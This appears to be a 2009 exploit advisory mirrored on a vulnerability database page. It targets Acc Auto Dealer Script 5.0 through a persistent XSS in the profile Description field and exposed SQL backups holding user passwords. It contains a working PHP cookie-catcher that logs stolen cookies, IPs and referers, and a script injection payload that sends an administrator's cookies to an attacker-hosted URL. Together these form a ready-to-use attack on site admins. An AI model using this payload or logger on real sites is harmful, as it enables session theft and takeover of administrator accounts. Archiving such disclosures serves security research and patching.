Lucene search
K

Acc Auto Dealer Script XSS / Backup Disclosure

🗓️ 14 Dec 2009 00:00:00Reported by bi0Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Acc Auto Dealer Script XSS / Backup Disclosure

Code
`  
______ __ ______   
/\ == \ /\ \ /\ __ \   
\ \ __< \ \ \ \ \ \/\ \   
\ \_____\ \ \_\ \ \_____\   
\/_____/ \/_/ \/_____/   
  
01000010 01101001 01001111   
  
[#]----------------------------------------------------------------[#]  
#   
# [+] Acc Auto Dealer Script [ Persistent XSS / SQL backup ]  
#  
# // Author Info   
# [x] Author: bi0  
# [x] Contact: [email protected]   
# [x] Homepage : www.ssteam.ws  
# [x] Thanks: packetdeath,redking,Zer0flag,sp1r1t and ssteam.ws ...  
#  
# // Software Info   
# [x] Name : Auto Dealer Script   
# [x] Vendor : http://www.accscripts.com/autos/  
# [x] Version : 5.0  
#  
[#]-------------------------------------------------------------------------------------------[#]  
#  
# [x] Exploit :   
#   
# [SQL Backup]   
#   
# http://localhost/[path]/temp/  
# and serach for .sql .You can find users & passwords  
#  
# [ Persistent XSS ]   
#  
# At the Auto Dealer Script you can register as an normal user and at your Control Panel  
# You can modify "Description" and put there an javascript code to steal cookies, Then if   
# Site admin visits your profile you can steal their cookies. EX :  
#   
# // Cookie Catcher "cookie.php"  
# You must Host somewhere cookie.php   
#=======================================================================   
  
<?php  
$cookie = $_GET['c'];  
$ip = getenv ('REMOTE_ADDR');  
$date=date("j F, Y, g:i a");;  
$referer=getenv ('HTTP_REFERER');  
$fp = fopen('cookies.html', 'a');  
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');  
fclose($fp);  
?>  
  
#=========================================================================  
#   
# // And at your Description type :   
#  
#=========================================================================  
  
"/><script>document.location="http://host/cookie.php?c="+document.cookie</script>  
  
#=========================================================================   
#   
# Now if site admin visits you'r profile their cookies will be saved at   
# http://host/cookie.html   
#  
[#]------------------------------------------------------------------------------------------[#]  
  
#EOF   
_________________________________________________________________  
Windows Live Hotmail: Your friends can get your Facebook updates, right from Hotmail®.  
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_4:092009`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation